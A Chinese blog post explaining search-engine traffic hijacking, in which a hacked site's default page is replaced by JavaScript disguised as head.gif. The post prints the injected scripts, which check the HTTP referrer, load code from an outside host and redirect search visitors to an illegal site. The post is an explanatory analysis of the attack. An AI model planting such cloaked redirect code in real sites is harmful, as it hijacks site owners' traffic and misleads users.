今天我们网站遇到了同样的麻烦,原来以为很麻烦 后来才知道 原来中了一句话。
网站辛辛苦苦的seo优化成果出来了,可点击百度排名结果居然跳转到别的网站!!作为一个seo,恐怕这种事情是最让人上火的情况之一了。最进不少排名较 好的网站出现了这么一个现象,从百度里搜索我的网站排名的关键词,在排名的搜索结果页面点击想进入网站,可是打开后立刻跳转的一些非法网站上去了,就连直 接搜索网址的结果页也是这样。可是如果在浏览器的地址栏里输入自己网站的网址却能正常进去浏览网站。最终的结论只有一个,很多的非法网站通过病毒攻击劫持 了你网站通过搜索引擎来的流量。
这种搜索引擎流量劫持到底是怎么回事呢,原理是什么,需要怎么改正?
搜索引擎流量劫持流程图:
让我们从头开始讲起。
细心的朋友们可能已经发现了,如果我们直接输入被暗链攻击的网站的网址,是一切正常OK的;但是如果从百度的搜索结果中直接点击,就会跳转到非法网站中去,而且之前百度搜索结果页面也变成非法网站了。这到底是怎么回事儿?原来都是那个head.gif文件在装怪。
可是,看上去这不过就是个gif图片文件嘛,直接在浏览器中打开,还无法浏览呢。别急,让我们看看这个文件的真面目,它可是画过妆的。来看head.gif文件里面到底有什么:
GIF89a="";
var d=document.referrer;
if ((d.indexOf("%C6%F7")>0)||(d.indexOf("%C6%F7")>0)||(d.indexOf("%C6%F7")>0)){
document.writeln("<script src=http:\/\/www.58u88.cn\/webpic\/W0200208\/brrt.gif><\/script>");
}
else{
window.location.href="Default.asp"
}
看吧,其实这个head.gif文件并不是一个图片文件,而是一个JavaScript文件,不过是改了一个后缀名,其实一样可以正常运行。
这下就不难理解了,无论是我们手动输入网址,还是从百度直接点击过来,由于网站已经被暗链攻击了,其默认页面被设置成了这个head.gif文件,这个文件会通过HTTP Referrer来判断用户是从哪里来的。如果是用户手动输入的,则打开网站原来的Default.asp页面;如果来自百度搜索,那就跳转到另一个gif文件:http://www.58u88.cn/webpic/w0200208/brrt.gif
看上去这也是一个gif文件呀,不过有了上面的例子,大家都应该可以猜到,其实这也是一个改了后缀名的JavaScript文件,来看它的内容:
var d=document.referrer;
if (d.indexOf("%CC%FD")>0 ||d.indexOf("%C6%F7")>0) {
self.location="http://www.sitoyota.com/";
window.opener.location="http://www.sitoyota.com/"
};
哦,这个文件就更加清楚了,它也在做判断,如果来自百度搜索结果,那就跳转到非法网站去,否则什么都不干。
至此,一次暗链攻击就已经完成了。
暗链攻击要获得成功的话,需要具备这些前提条件:
当用户直接访问正规网站的时候,恶意文件会将用户的http请求转跳到正常页面,于是用户不容易发现网站异常;但是如果用户是从搜索结果页面点进进入的话,该恶意文件就会将用户http请求转跳到非法网站。
这样做对黑客有什么好处呢?很明显,正规网站在搜索结果中的排名往往比较靠前,如果被植入恶意文件,搜索引擎的蜘蛛也会被跳转到该非法 网站(我猜的,有待考证),由于搜索引擎目前还无法识别出这个网站被攻击了,于是误以为这个正规网站的域名下面,放的是该非法网站的内容,于是照常收录。 再后来,用户在进行搜索的时候,就会出现点击了该正规网站的链接,打开的却是非法网站。
感谢:jude_liu